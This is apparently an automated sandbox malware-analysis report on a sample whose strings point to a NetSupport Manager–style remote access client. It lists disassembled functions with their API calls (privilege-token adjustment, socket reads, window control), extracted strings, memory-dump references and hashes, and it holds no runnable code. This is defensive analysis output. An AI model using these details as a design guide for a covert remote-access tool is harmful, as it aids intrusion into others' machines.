call 11081a70 2137->2156 2157 1113933e-11139351 call 11143230 2137->2157 2140->2098 2141->2140 2148 11139179-11139190 call 11146450 GetForegroundWindow 2141->2148 2143->2101 2150 1113925f-1113927a GetForegroundWindow call 11131210 * 2 2143->2150 2152 111394ac-111394b2 2145->2152 2146->2125 2147->2125 2161 11139192-111391bc EnableWindow call 11131210 * 2 EnableWindow 2148->2161 2162 111391be-111391c0 2148->2162 2195 1113928b-11139294 EnableWindow 2150->2195 2196 1113927c-11139282 2150->2196 2158 111394b4-111394ba call 11131b00 2152->2158 2159 111394bd-111394c6 2152->2159 2156->2157 2183 1113933b 2156->2183 2184 11139353-11139364 GetLastError call 11146450 2157->2184 2185 1113936e-11139375 2157->2185 2158->2159 2167 111394d4 call 111317a0 2159->2167 2168 111394c8-111394cb 2159->2168 2161->2162 2162->2140 2171 111391c2-111391c8 2162->2171 2176 111394d9-111394df 2167->2176 2168->2176 2177 111394cd-111394d2 call 11131870 2168->2177 2171->2140 2181 111391ca-111391cb SetForegroundWindow 2171->2181 2179 111394e5-111394eb 2176->2179 2180 111395e9-111395f4 call 111386b0 2176->2180 2177->2176 2192 111394f1-111394f9 2179->2192 2193 1113959b-111395a3 2179->2193 2205 111395f6-11139608 call 110637c0 2180->2205 2206 11139615-1113961b 2180->2206 2181->2140 2183->2157 2184->2185 2189 11139377-11139392 2185->2189 2190 111393e8 2185->2190 2203 11139395-111393a1 2189->2203 2190->2111 2192->2180 2199 111394ff-11139505 2192->2199 2193->2180 2202 111395a5-111395e3 call 1103f000 call 1103f040 call 1103f060 call 1103f020 call 1110f270 2193->2202 2195->2101 2196->2195 2201 11139284-11139285 SetForegroundWindow 2196->2201 2199->2180 2204 1113950b-11139522 call 1110f420 2199->2204 2201->2195 2202->2180 2210 111393a3-111393b7 call 11081a70 2203->2210 2211 111393bc-111393c9 call 11143230 2203->2211 2224 11139544 2204->2224 2225 11139524-11139542 call 110573b0 2204->2225 2205->2206 2227 1113960a-11139610 call 11142210 2205->2227 2208 11139621-11139628 2206->2208 2209 1113974a-11139752 2206->2209 2208->2209 2216 1113962e-11139647 call 1105dd10 2208->2216 2209->2099 2210->2211 2230 111393b9 2210->2230 2211->2190 2232 111393cb-111393e6 GetLastError call 11146450 2211->2232 2216->2209 2236 1113964d-11139660 2216->2236 2233 11139546-11139592 call 1110f260 call 1104ce00 call 1104e340 call 1104e3b0 call 1104ce40 2224->2233 2225->2233 2227->2206 2230->2211 2232->2118 2233->2180 2267 11139594-11139599 call 110ebf30 2233->2267 2248 11139662-11139668 2236->2248 2249 1113968d-11139693 2236->2249 2252 1113966a-11139688 call 11146450 GetTickCount 2248->2252 2253 11139699-111396a5 GetTickCount 2248->2253 2249->2209 2249->2253 2252->2209 2253->2209 2256 111396ab-111396eb call 11142e80 call 11146ee0 call 11142e80 call 11025bb0 2253->2256 2273 111396f0-111396f5 2256->2273 2267->2180 2273->2273 2274 111396f7-111396fd 2273->2274 2275 11139700-11139705 2274->2275 2275->2275 2276 11139707-11139731 call 1112c7a0 2275->2276 2279 11139733-11139734 FreeLibrary 2276->2279 2280 1113973a-11139747 call 111618c1 2276->2280 2279->2280 2280->2209
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                      • IsWindow.USER32(00030496), ref: 11139125
                                                                                      • IsWindowVisible.USER32(00030496), ref: 11139133
                                                                                      • IsWindowVisible.USER32(00030496), ref: 1113916B
                                                                                      • GetForegroundWindow.USER32 ref: 11139186
                                                                                      • EnableWindow.USER32(00030496,00000000), ref: 111391A0
                                                                                      • EnableWindow.USER32(00030496,00000001), ref: 111391BC
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                      • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                      • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                      • IsWindowVisible.USER32(00030496), ref: 11139248
                                                                                      • IsIconic.USER32(00030496), ref: 11139255
                                                                                      • GetForegroundWindow.USER32 ref: 1113925F
                                                                                        • Part of subcall function 11131210: ShowWindow.USER32(00030496,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                        • Part of subcall function 11131210: ShowWindow.USER32(00030496,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                      • EnableWindow.USER32(00030496,00000001), ref: 11139294
                                                                                      • GetLastError.KERNEL32 ref: 11139353
                                                                                      • GetLastError.KERNEL32 ref: 111393CB
                                                                                      • GetTickCount.KERNEL32 ref: 11139678
                                                                                      • GetTickCount.KERNEL32 ref: 11139699
                                                                                        • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                      • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                      • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                      • API String ID: 2511061093-2542869446
                                                                                      • Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                      • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                      • Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                      • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                      Function 6C5D91F0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 97sleepnetworkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • #16.WSOCK32(00000000,?,a3^l,00000000,00000000,?,00000007), ref: 6C5D924C
                                                                                      • WSAGetLastError.WSOCK32(00000000,?,a3^l,00000000,00000000,?,00000007), ref: 6C5D925B
                                                                                      • GetTickCount.KERNEL32 ref: 6C5D9274
                                                                                      • Sleep.KERNEL32(00000001,00000000,?,a3^l,00000000,00000000,?,00000007), ref: 6C5D92A8
                                                                                      • GetTickCount.KERNEL32 ref: 6C5D92B0
                                                                                      • Sleep.KERNEL32(00000014), ref: 6C5D92BC
                                                                                      Strings
                                                                                      • ReadSocket - Connection has been closed by peer, xrefs: 6C5D92E0
                                                                                      • ReadSocket - Error %d reading response, xrefs: 6C5D92F7
                                                                                      • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6C5D922B
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C5D9226
                                                                                      • ReadSocket - Would block, xrefs: 6C5D928A
                                                                                      • a3^l, xrefs: 6C5D9244
                                                                                      • *RecvTimeout, xrefs: 6C5D927B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountSleepTick$ErrorLast
                                                                                      • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3^l$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                      • API String ID: 2495545493-3425134272
                                                                                      • Opcode ID: 33e875e09022cfc04a646acb22b40cdd98fc642f8d20e01b6c4bc488a390689e
                                                                                      • Instruction ID: b6b82bb0c7a53810def9def3cfbeb8ec5dc44364cda453f3f9bd56f1836d49ea
                                                                                      • Opcode Fuzzy Hash: 33e875e09022cfc04a646acb22b40cdd98fc642f8d20e01b6c4bc488a390689e
                                                                                      • Instruction Fuzzy Hash: 4F31B175E04308EFDB00DFADDC85B8EB3B4EB85326F014959E909D7E40EB31A9548B99
                                                                                      Function 6C5E3130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemTime.KERNEL32(?,?,?,939E354D,6E272756,939E34B3,FFFFFFFF,00000000), ref: 6C5E31E2
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C60ECB0), ref: 6C5E31EC
                                                                                      • GetSystemTime.KERNEL32(?,6E272756,939E34B3,FFFFFFFF,00000000), ref: 6C5E322A
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C60ECB0), ref: 6C5E3234
                                                                                      • EnterCriticalSection.KERNEL32(6C61B898,?,939E354D), ref: 6C5E32BE
                                                                                      • LeaveCriticalSection.KERNEL32(6C61B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6C5E32D3
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C5E334D
                                                                                        • Part of subcall function 6C5EBA20: __strdup.LIBCMT ref: 6C5EBA3A
                                                                                        • Part of subcall function 6C5EBB00: _free.LIBCMT ref: 6C5EBB2D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                      • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                      • API String ID: 1510130979-3441452530
                                                                                      • Opcode ID: 4b614711c9917101a9c2084e4b2f08b331ea9d62280805306bc76c0680d4c0c3
                                                                                      • Instruction ID: af380195d1e21f30bdfc9e1bba848f2f398b1c5eec60eda308c213ca68385834
                                                                                      • Opcode Fuzzy Hash: 4b614711c9917101a9c2084e4b2f08b331ea9d62280805306bc76c0680d4c0c3
                                                                                      • Instruction Fuzzy Hash: AC617472904208EFCB14DFA8DC85EDEB7B9FF89305F14451AE416A3B50EB34A908CB55
                                                                                      Function 11115B70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                      • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                      • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                      • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                      • String ID: SHELL32.DLL$SHGetSettings
                                                                                      • API String ID: 4195908086-2348320231
                                                                                      • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                      • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                      • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                      • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
                                                                                      Function 110733B0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: NBCTL32.DLL$_License$serial_no
                                                                                      • API String ID: 2102423945-35127696
                                                                                      • Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                      • Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
                                                                                      • Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                      • Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90
                                                                                      Function 110310C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID: Client32$NSMWClass$NSMWClass
                                                                                      • API String ID: 3192549508-611217420
                                                                                      • Opcode ID: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                      • Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
                                                                                      • Opcode Fuzzy Hash: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                      • Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95
                                                                                      Function 1109E910 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00C22EB8,00C22EB8,00C22EB8,00C22EB8,00C22EB8,00C22EB8,00C22EB8,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                      • EqualSid.ADVAPI32(?,00C22EB8,?,00000001,00000001), ref: 1109E9A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InformationToken$AllocateEqualInitialize
                                                                                      • String ID:
                                                                                      • API String ID: 1878589025-0
                                                                                      • Opcode ID: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                      • Instruction ID: 8f268d00a2632c5decc73a479da56acc1190ac8ef7b7f04f8431c56e7d3a1b5e
                                                                                      • Opcode Fuzzy Hash: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                      • Instruction Fuzzy Hash: 22217131B0122EABEB10DBA4CC81BBEB7B8EB44708F100469E919D7184E671AD00CBA1
                                                                                      Function 1109D440 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,A1BC2D8B,00080000,00000000,00000000), ref: 1109D46D
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                      • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                      • String ID:
                                                                                      • API String ID: 2349140579-0
                                                                                      • Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                      • Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
                                                                                      • Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                      • Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71
                                                                                      Function 1109D4D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                      • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
